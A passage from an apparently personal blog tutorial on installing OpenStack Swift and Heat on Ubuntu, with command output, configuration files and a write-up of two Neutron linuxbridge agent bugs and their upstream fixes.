<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6200 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6200R10.0.0.41:6200/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6200 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6200R10.0.0.41:6200/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6200 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6200R10.0.0.51:6200/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6200 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6200R10.0.0.51:6200/vdc_"" with 100.0 weight got id 3
</code></pre></div></div>
<p>We can view the contents of the ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder
object.builder, build version 4, id 092ad11e9c4d4939a6a4a6acf110cea0
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file object.ring.gz not found, probably it hasn't been written yet
Devices: id region zone ip address:port replication ip:port name weight partitions balance flags meta
0 1 1 10.0.0.41:6200 10.0.0.41:6200 vdb 100.00 0 -100.00
1 1 1 10.0.0.41:6200 10.0.0.41:6200 vdc 100.00 0 -100.00
2 1 1 10.0.0.51:6200 10.0.0.51:6200 vdb 100.00 0 -100.00
3 1 1 10.0.0.51:6200 10.0.0.51:6200 vdc 100.00 0 -100.00
</code></pre></div></div>
<p>We can rebalance with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00. Dispersion is now 0.00
</code></pre></div></div>
<p>If you look in <code class="language-plaintext highlighter-rouge">/etc/swift</code>, there are now some compressed archives:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ll /etc/swift
total 116
drwxr-xr-x 3 root root 4096 Feb 6 00:22 ./
drwxr-xr-x 121 root root 4096 Feb 4 23:05 ../
-rw-r--r-- 1 root root 9827 Feb 6 00:13 account.builder
-rw-r--r-- 1 root root 1475 Feb 6 00:13 account.ring.gz
drwxr-xr-x 2 root root 4096 Feb 6 00:22 backups/
-rw-r--r-- 1 root root 9827 Feb 6 00:18 container.builder
-rw-r--r-- 1 root root 1489 Feb 6 00:18 container.ring.gz
-rw-r--r-- 1 root root 9827 Feb 6 00:22 object.builder
-rw-r--r-- 1 root root 1471 Feb 6 00:22 object.ring.gz
-rw-r--r-- 1 root root 53820 Feb 4 23:23 proxy-server.conf
</code></pre></div></div>
<p>These need to be copied to each of the object storage nodes. Let’s do that.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ for x in 10.0.0.41 10.0.0.51; do scp *.ring.gz ubuntu@$x:~/;done
ubuntu@10.0.0.41's password:
account.ring.gz 100% 1475 562.7KB/s 00:00
container.ring.gz 100% 1489 3.1MB/s 00:00
object.ring.gz 100% 1471 2.3MB/s 00:00
ubuntu@10.0.0.51's password:
account.ring.gz 100% 1475 607.6KB/s 00:00
container.ring.gz 100% 1489 3.7MB/s 00:00
object.ring.gz 100% 1471 2.8MB/s 00:00
</code></pre></div></div>
<p>Now log onto both the object storage nodes and move the archives to <code class="language-plaintext highlighter-rouge">/etc/swift</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mv *.ring.gz /etc/swift
</code></pre></div></div>
<h3 id="setting-up-the-master-swift-configuration">Setting up the Master Swift Configuration</h3>
<p>The last thing we need to do is to set up the master configuration for Swift.
SSH into your controller node, and let’s do it:</p>
<p>Change into the <code class="language-plaintext highlighter-rouge">/etc/swift</code> directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd /etc/swift
</code></pre></div></div>
<p>Download the config file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo curl -o /etc/swift/swift.conf \
https://opendev.org/openstack/swift/raw/branch/master/etc/swift.conf-sample
</code></pre></div></div>
<p>We need to generate two secrets, which we will again do with <code class="language-plaintext highlighter-rouge">openssl</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openssl rand -hex 6
6243f9946d1e
$ openssl rand -hex 6
69bab31f606c
</code></pre></div></div>
<p>And edit <code class="language-plaintext highlighter-rouge">/etc/swift/swift.conf</code>. Note that these hash path values feed into object
placement, so they must never change once the cluster is storing data:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/swift.conf
[swift-hash]
swift_hash_path_suffix = 6243f9946d1e
swift_hash_path_prefix = 69bab31f606c
[storage-policy:0]
name = Policy-0
default = yes
</code></pre></div></div>
<p>From there, this <code class="language-plaintext highlighter-rouge">/etc/swift/swift.conf</code> file needs to be distributed to all the
object storage nodes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ for x in 10.0.0.41 10.0.0.51; do scp /etc/swift/swift.conf ubuntu@$x:~/; done
ubuntu@10.0.0.41's password:
swift.conf 100% 8451 2.9MB/s 00:00
ubuntu@10.0.0.51's password:
swift.conf 100% 8451 1.7MB/s 00:00
</code></pre></div></div>
<p>Then SSH into each of the object storage nodes and move the file to
<code class="language-plaintext highlighter-rouge">/etc/swift/swift.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mv swift.conf /etc/swift/swift.conf
$ sudo chown -R root:swift /etc/swift
</code></pre></div></div>
<p>Lastly, we need to restart the services:</p>
<p>On the controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart memcached
$ sudo systemctl restart swift-proxy
</code></pre></div></div>
<p>On the object storage nodes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-init all start
</code></pre></div></div>
<h3 id="verifying-swift-was-installed-correctly">Verifying Swift Was Installed Correctly</h3>
<p>We can see if Swift is working correctly by making a container and placing
an object in it. Do the following on the controller node:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . demo-openrc
$ swift stat
Account: AUTH_33569bb56110474db2d584b4a1936c6b
Containers: 0
Objects: 0
Bytes: 0
Content-Type: text/plain; charset=utf-8
X-Timestamp: 1580951741.32857
X-Put-Timestamp: 1580951741.32857
X-Trans-Id: tx0dec10331bb941488a804-005e3b68bc
X-Openstack-Request-Id: tx0dec10331bb941488a804-005e3b68bc
</code></pre></div></div>
<p>Now we will make a container, make a file, and place it in the container:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack container create container1
+---------------------------------------+------------+------------------------------------+
| account | container | x-trans-id |
+---------------------------------------+------------+------------------------------------+
| AUTH_33569bb56110474db2d584b4a1936c6b | container1 | txc383885cf6d44d2fb3f07-005e3b6a65 |
+---------------------------------------+------------+------------------------------------+
$ echo "Test for Demo user" > test_file.txt
$ openstack object create container1 test_file.txt
+---------------+------------+----------------------------------+
| object | container | etag |
+---------------+------------+----------------------------------+
| test_file.txt | container1 | ffc8c08a288fd4d5b11804fc331909b7 |
+---------------+------------+----------------------------------+
$ openstack object list container1
+---------------+
| Name |
+---------------+
| test_file.txt |
+---------------+
</code></pre></div></div>
<p>We can download the file and view it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir test
$ cd test
$ openstack object save container1 test_file.txt
$ cat test_file.txt
Test for Demo user
</code></pre></div></div>
<p>It worked! We can now delete the file with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack object delete container1 test_file.txt
</code></pre></div></div>
<h2 id="installing-heat-the-orchestration-service">Installing Heat, the Orchestration Service</h2>
<p>Heat is the orchestration service for OpenStack. Heat takes input in the form of
templates which describe the deployment specifications for an application. You
can specify what sort of virtual machines are required, their storage needs and
network topologies, and Heat will go and make the infrastructure needed a reality.</p>
<p>Heat can manage the entire lifecycle of an application, from the initial deployment
to changing requirements midway through, and to tearing down.</p>
<p>Heat directly interacts with the OpenStack API endpoints of the major services
to manage infrastructure.</p>
<p>I will be following the <a href="https://docs.openstack.org/heat/train/install/install-ubuntu.html">Install Documentation</a>.</p>
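<p>To give a flavour of what those templates look like before we dig into the
install, here is a minimal sketch of a HOT template that launches a single
server; the image, flavor and network names are hypothetical placeholders:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>heat_template_version: 2015-10-15
description: Launch a single test instance
resources:
  my_server:
    type: OS::Nova::Server
    properties:
      image: cirros
      flavor: m1.nano
      networks:
        - network: provider
</code></pre></div></div>
<p>Once Heat is up, a template like this would be deployed with
<code class="language-plaintext highlighter-rouge">openstack stack create -t template.yaml mystack</code>.</p>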
<h3 id="creating-the-heat-database">Creating the Heat Database</h3>
<p>Heat, like most OpenStack services need a database, so let’s make one on the
Controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE heat;
Query OK, 1 row affected (0.012 sec)
</code></pre></div></div>
<p>Add the heat user and grant privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> GRANT ALL PRIVILEGES ON heat.* TO 'heat'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.012 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON heat.* TO 'heat'@'%' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.012 sec)
</code></pre></div></div>
<h3 id="creating-the-heat-user-and-services">Creating the Heat User and Services</h3>
<p>Let’s make a user for Heat:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt heat
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | 3c8ca893913742619ed257ad0553b489 |
| name | heat |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user heat admin
</code></pre></div></div>
<p>Heat needs two services to be created: <code class="language-plaintext highlighter-rouge">heat</code> and <code class="language-plaintext highlighter-rouge">heat-cfn</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name heat --description "Orchestration" orchestration
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Orchestration |
| enabled | True |
| id | 41cc3e7d6b634e80b31f1a88c4472aab |
| name | heat |
| type | orchestration |
+-------------+----------------------------------+
$ openstack service create --name heat-cfn --description "Orchestration" cloudformation
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Orchestration |
| enabled | True |
| id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| name | heat-cfn |
| type | cloudformation |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Since we created two services, we now need to define two sets of endpoints. The
first for <code class="language-plaintext highlighter-rouge">heat</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne orchestration public http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field | Value |
+--------------+-----------------------------------------+
| enabled | True |
| id | e33e7674797a497dbc1e5d425add3992 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 41cc3e7d6b634e80b31f1a88c4472aab |
| service_name | heat |
| service_type | orchestration |
| url | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
$ openstack endpoint create --region RegionOne orchestration internal http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field | Value |
+--------------+-----------------------------------------+
| enabled | True |
| id | 67df0a3ade9d4322865daa20b87ac082 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 41cc3e7d6b634e80b31f1a88c4472aab |
| service_name | heat |
| service_type | orchestration |
| url | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
$ openstack endpoint create --region RegionOne orchestration admin http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field | Value |
+--------------+-----------------------------------------+
| enabled | True |
| id | 7f16502e18994f45a39fb40443636c8c |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 41cc3e7d6b634e80b31f1a88c4472aab |
| service_name | heat |
| service_type | orchestration |
| url | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
</code></pre></div></div>
<p>The second for <code class="language-plaintext highlighter-rouge">heat-cfn</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne cloudformation public http://controller:8000/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | a9944905d2474773a6f2604619ab86e3 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn |
| service_type | cloudformation |
| url | http://controller:8000/v1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne cloudformation internal http://controller:8000/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 587390973b9f4817a8ad2e27b04373b9 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn |
| service_type | cloudformation |
| url | http://controller:8000/v1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne cloudformation admin http://controller:8000/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | a6494f8979e44921b85cd6595e136837 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn |
| service_type | cloudformation |
| url | http://controller:8000/v1 |
+--------------+----------------------------------+
</code></pre></div></div>
<p>Heat requires a dedicated domain to manage the infrastructure it creates, so we
need to create that, along with an admin user for the new domain and the
<code class="language-plaintext highlighter-rouge">heat_stack_owner</code> and <code class="language-plaintext highlighter-rouge">heat_stack_user</code> roles:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack domain create --description "Stack projects and users" heat
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Stack projects and users |
| enabled | True |
| id | 1337b657083e4946996d55cf49ce80e0 |
| name | heat |
| options | {} |
| tags | [] |
+-------------+----------------------------------+
$ openstack user create --domain heat --password-prompt heat_domain_admin
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | 1337b657083e4946996d55cf49ce80e0 |
| enabled | True |
| id | 81277e90fa7341aea05224e59adbd6ea |
| name | heat_domain_admin |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --domain heat --user-domain heat --user heat_domain_admin admin
$ openstack role create heat_stack_owner
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| domain_id | None |
| id | 1625641497494370b0f98e6d1dcb0b2e |
| name | heat_stack_owner |
| options | {} |
+-------------+----------------------------------+
$ openstack role add --project demo --user demo heat_stack_owner
$ openstack role create heat_stack_user
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| domain_id | None |
| id | 8dfebc17aa4f45b5b5ed1e4be35ce98b |
| name | heat_stack_user |
| options | {} |
+-------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-and-configuring-heat-on-the-controller">Installing and Configuring Heat on the Controller</h3>
<p>Once all the users, services and endpoints are set up, we can install the Heat
packages and start configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install heat-api heat-api-cfn heat-engine
</code></pre></div></div>
<p>Let’s configure it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/heat/heat.conf
[database]
connection = mysql+pymysql://heat:password123@controller/heat
[DEFAULT]
transport_url = rabbit://openstack:password123@controller
heat_metadata_server_url = http://controller:8000
heat_waitcondition_server_url = http://controller:8000/v1/waitcondition
stack_domain_admin = heat_domain_admin
stack_domain_admin_password = openstack
stack_user_domain_name = heat
</code></pre></div></div>
<p>Then, still in <code class="language-plaintext highlighter-rouge">/etc/heat/heat.conf</code>, we need to configure the Keystone authentication sections:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = heat
password = openstack
[trustee]
auth_type = password
auth_url = http://controller:5000
username = heat
password = openstack
user_domain_name = default
[clients_keystone]
auth_uri = http://controller:5000
</code></pre></div></div>
<p>Save the file, then populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "heat-manage db_sync" heat
</code></pre></div></div>
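<p>If you want to double check that the sync worked, you can peek at the
database directly. This is just a sketch, reusing the database credentials
configured above and assuming the MySQL client is available on the controller;
you should see Heat’s tables (stack, resource, event, and so on) listed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mysql -h controller -u heat -ppassword123 heat -e "SHOW TABLES;"
</code></pre></div></div>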
<p>Finally, restart the Heat services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart heat-api
$ sudo systemctl restart heat-api-cfn
$ sudo systemctl restart heat-engine
</code></pre></div></div>
<p>We can verify everything is working as intended by listing the services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack orchestration service list
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
| Hostname | Binary | Engine ID | Host | Topic | Updated At | Status |
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
| controller | heat-engine | 993cff41-f3cf-45d3-9f38-d09e04fff701 | controller | engine | 2020-02-06T03:09:12.000000 | up |
| controller | heat-engine | 1640f217-da50-4565-b6e1-cdbc26a688a7 | controller | engine | 2020-02-06T03:09:12.000000 | up |
| controller | heat-engine | 2051654e-bb5d-45c5-9d48-5e83cfea4e04 | controller | engine | 2020-02-06T03:09:12.000000 | up |
| controller | heat-engine | d19f1626-5830-452f-a198-071950d88a1d | controller | engine | 2020-02-06T03:09:12.000000 | up |
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
</code></pre></div></div>
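<p>As an optional smoke test, we can ask Heat to create a trivial stack. This is
a sketch rather than part of the official install guide: the template below is a
minimal, hypothetical HOT template with no resources, and it assumes the
<code class="language-plaintext highlighter-rouge">python3-heatclient</code> plugin for the openstack CLI is installed and that your
user holds the <code class="language-plaintext highlighter-rouge">heat_stack_owner</code> role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cat > smoke.yaml <<'EOF'
heat_template_version: 2018-08-31
description: Minimal template to check Heat answers requests
outputs:
  message:
    value: Heat is working
EOF
$ openstack stack create --wait -t smoke.yaml smoketest
$ openstack stack output show smoketest message
$ openstack stack delete --yes smoketest
</code></pre></div></div>
<p>If the stack reaches CREATE_COMPLETE and the output is printed, heat-api and
heat-engine are talking to each other correctly.</p>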
<h1 id="bugs-i-encountered-and-how-to-fix-them">Bugs I Encountered and How to Fix Them</h1>
<p>Right at the very end, after completing the next section, I ran into problems:
my instances kept failing to launch. After a bit of
debugging, it turned out that I had hit two separate bugs in Neutron.</p>
<h2 id="neutron-on-the-controller-node-keyerror-gateway">Neutron on the Controller Node: KeyError: ‘gateway’</h2>
<p>After reviewing <code class="language-plaintext highlighter-rouge">/var/log/neutron/neutron-linuxbridge-agent.log</code> on the controller
node, I saw the following (full error included for those googling for help in the future =D):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ERROR neutron.plugins.ml2.drivers.agent._common_agent [req-94658efb-0dd2-4c95-94ba-85b2ee8c49c2 - - - - -] Error in agent loop. Devices info: {'current': {'tapee2ba6c7-78'}, 'timesta
mps': {'tapee2ba6c7-78': 5}, 'added': {'tapee2ba6c7-78'}, 'removed': set(), 'updated': set()}: KeyError: 'gateway'
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 465, in daemon_loop
sync = self.process_network_devices(device_info)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 214, in process_network_devices
resync_a = self.treat_devices_added_updated(devices_added_updated)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 231, in treat_devices_added_updated
self._process_device_if_exists(device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 258, in _process_device_if_exists
device, device_details['device_owner'])
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 586, in plug_interface
network_segment.mtu)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 522, in add_tap_interface
return False
File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 220, in __exit__
self.force_reraise()
File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise
six.reraise(self.type_, self.value, self.tb)
File "/usr/lib/python3/dist-packages/six.py", line 693, in reraise
raise value
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 514, in add_tap_interface
tap_device_name, device_owner, mtu)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 547, in _add_tap_interface
mtu):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 498, in ensure_physical_in_bridge
physical_interface)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 287, in ensure_flat_bridge
if self.ensure_bridge(bridge_name, physical_interface):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 456, in ensure_bridge
self.update_interface_ip_details(bridge_name, interface)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 418, in update_interface_ip_details
gateway)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 402, in _update_interface_ip_details
dst_device.route.add_gateway(gateway=gateway['gateway'],
KeyError: 'gateway'
</code></pre></div></div>
<p>One of my team members linked me to this <a href="https://ask.openstack.org/en/question/125368/neutronpluginsml2driversagent_common_agent-keyerror-gateway/">Ask OpenStack</a>
page, since it lists the same problem. I tried using <code class="language-plaintext highlighter-rouge">brctl addif</code> to add the
new bridges to the interfaces, but it did not solve the problem.</p>
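<p>(For reference, the attempt looked something like the following; the bridge
and interface names here are hypothetical and will differ on your machine:)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo brctl addif brq01ae2817-96 ens4
</code></pre></div></div>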
<p>After a bit more googling, I tracked down <a href="https://bugs.launchpad.net/neutron/+bug/1855759">Launchpad Bug #1855759</a>.</p>
<p>This is the exact problem I was hitting. Nice to see it got fixed upstream and
backported to the upstream stable branches for Neutron.</p>
<p>I manually modified the files under <code class="language-plaintext highlighter-rouge">/usr/lib/python3/dist-packages/neutron/</code>,
and applied the changes from the following commit to them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit b99765df8f1d1d6d3ceee3d481d1e6ee1b2200e7
Author: Rodolfo Alonso Hernandez <ralonsoh@redhat.com>
Date: Tue Dec 10 15:50:20 2019 +0000
Subject: Use "via" in gateway dictionary in Linux Bridge agent
</code></pre></div></div>
<p>I used the <a href="https://opendev.org/openstack/neutron/commit/124680084c6f921b49df5da0095ff80053ca0e52">Backported Commit to Train</a>.</p>
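<p>If you would rather apply the commit as a patch than edit the files by hand,
something along these lines should also work. This is a sketch: the
<code class="language-plaintext highlighter-rouge">.patch</code> suffix is the raw patch form opendev serves for a commit, and any
hunks touching Neutron’s test suite may need to be skipped if the packaged tree
does not ship the tests:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -sL https://opendev.org/openstack/neutron/commit/124680084c6f921b49df5da0095ff80053ca0e52.patch -o /tmp/gateway-fix.patch
$ cd /usr/lib/python3/dist-packages
$ sudo patch -p1 --dry-run < /tmp/gateway-fix.patch
$ sudo patch -p1 < /tmp/gateway-fix.patch
</code></pre></div></div>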
<p>After that I restarted all Neutron services on the controller, and everything
worked.</p>
<p>Yes, I will make sure to SRU this fix to Eoan to help everyone out - watch this
space.</p>
<h2 id="neutron-on-the-compute-note-ebtables-unknown-argument-among-src">Neutron on the Compute Note: ebtables Unknown argument ‘–among-src’</h2>
<p>After reviewing <code class="language-plaintext highlighter-rouge">/var/log/neutron/neutron-linuxbridge-agent.log</code> on the compute
node, I saw the following (full error included for those googling for help in the future =D):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ERROR neutron.plugins.ml2.drivers.agent._common_agent [req-91257a46-44ee-4246-b3b6-813d82f1c2d3 - - - - -] Error in agent loop. Devices info: {'current': {'tap5878f227-c9'}, 'timestamps': {'tap5878f227-c9': 13}, 'added': {'tap5878f227-c9'}, 'removed': set(), 'updated': set()}: neutron_lib.exceptions.ProcessExecutionError: Exit code: 2; Stdin: ; Stdout: ; Stderr: ebtables v1.8.3 (nf_tables): Unknown argument: '--among-src'
Try `ebtables -h' or 'ebtables --help' for more information.
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 465, in daemon_loop
sync = self.process_network_devices(device_info)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 214, in process_network_devices
resync_a = self.treat_devices_added_updated(devices_added_updated)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 231, in treat_devices_added_updated
self._process_device_if_exists(device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 246, in _process_device_if_exists
device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 865, in setup_arp_spoofing_protection
arp_protect.setup_arp_spoofing_protection(device, device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 42, in setup_arp_spoofing_protection
_setup_arp_spoofing_protection(vif, port_details)
File "/usr/lib/python3/dist-packages/oslo_concurrency/lockutils.py", line 328, in inner
return f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 48, in _setup_arp_spoofing_protection
_install_mac_spoofing_protection(vif, port_details, current_rules)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 184, in _install_mac_spoofing_protection
ebtables(new_rule)
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 292, in wrapped_f
return self.call(f, *args, **kw)
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 358, in call
do = self.iter(retry_state=retry_state)
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 319, in iter
return fut.result()
File "/usr/lib/python3.7/concurrent/futures/_base.py", line 428, in result
return self.__get_result()
File "/usr/lib/python3.7/concurrent/futures/_base.py", line 384, in __get_result
raise self._exception
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 361, in call
result = fn(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 232, in ebtables
run_as_root=True)
File "/usr/lib/python3/dist-packages/neutron/agent/linux/ip_lib.py", line 713, in execute
run_as_root=run_as_root)
File "/usr/lib/python3/dist-packages/neutron/agent/linux/utils.py", line 147, in execute
returncode=returncode)
neutron_lib.exceptions.ProcessExecutionError: Exit code: 2; Stdin: ; Stdout: ; Stderr: ebtables v1.8.3 (nf_tables): Unknown argument: '--among-src'
Try `ebtables -h' or 'ebtables --help' for more information.
</code></pre></div></div>
